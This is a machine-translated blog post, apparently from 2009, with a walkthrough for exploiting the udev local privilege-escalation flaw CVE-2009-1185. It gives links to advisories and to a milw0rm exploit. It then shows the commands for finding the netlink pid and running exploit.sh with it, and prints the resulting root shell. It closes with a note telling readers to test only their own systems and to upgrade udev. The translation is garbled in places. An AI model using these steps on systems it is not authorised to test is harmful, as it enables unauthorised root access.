linux udev permissions vulnerability testing methods-vulnerability warning-the black bar safety net

Author: Liang increased sea
Article source: http://s-logs.com/2009/04/linux-udev.html
Copyright: can any reproduced, reprinted, please be sure to hyperlink marked article origin and author information and this statement
Vulnerability relevant information may be in the following link to obtain:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
http://www.linux-magazine.com/online/news/local_root_exploit_in_udev
http://www.debian.org/security/2009/dsa-1772
http://milw0rm.com/exploits/8478

Test method:

Download the following script file:

exploit.sh

Placed in a directory, backup.

cat /proc/net/netlink

Get the following return:

user@debian:~/attack$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
f79e8200 0 2 7 8 4 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 2
f7a10200 0 2 7 7 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 2
dfb4ca00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2
dff58400 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2
dff7a800 9 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2
dff71e00 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2
f75dd200 1 5 1 1 7 5 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 2
dfb4c800 1 5 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2
dffb6a00 1 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2

Just download the sh file in the directory execute:

sh exploit.sh 2 7 8 4

Behind the numbers is the netlink pid, as shown in the previous example returns has multiple, multiple attempts. 2 7 8 to 4, 2 7 7 1, The 1 1 7 5, can to try it out.

The script will generate C files and calls GCC to compile, then execution. If the host does not support GCC, you can modify the code to try other compilers, or in the local compiled, upload the binary version try.

I’m trying to 1 1 7 5 success see the # end of the shell up you know what it means, Oh it.

user@debian:~/attack$ sh exploit.txt 1 1 7 5
suid. c: In function 鈓 ain?
suid. c:3: warning: incompatible implicit declaration of built-in function 鈋 xecl?
sh-3.2# id
uid=0(root) gid=0(root) groups=2 0(dialout),2 4(cdrom),2 5(floppy),2 9(audio),4 4(video),4 6(plugdev),1 0 6(netdev),1 0 9(powerdev),1 0 0 0(user)

Please readers do not used for illegal use, only for testing your own system is also the presence of this vulnerability. If there is, the more timely upgrade of the udev package, or upgrade the entire system.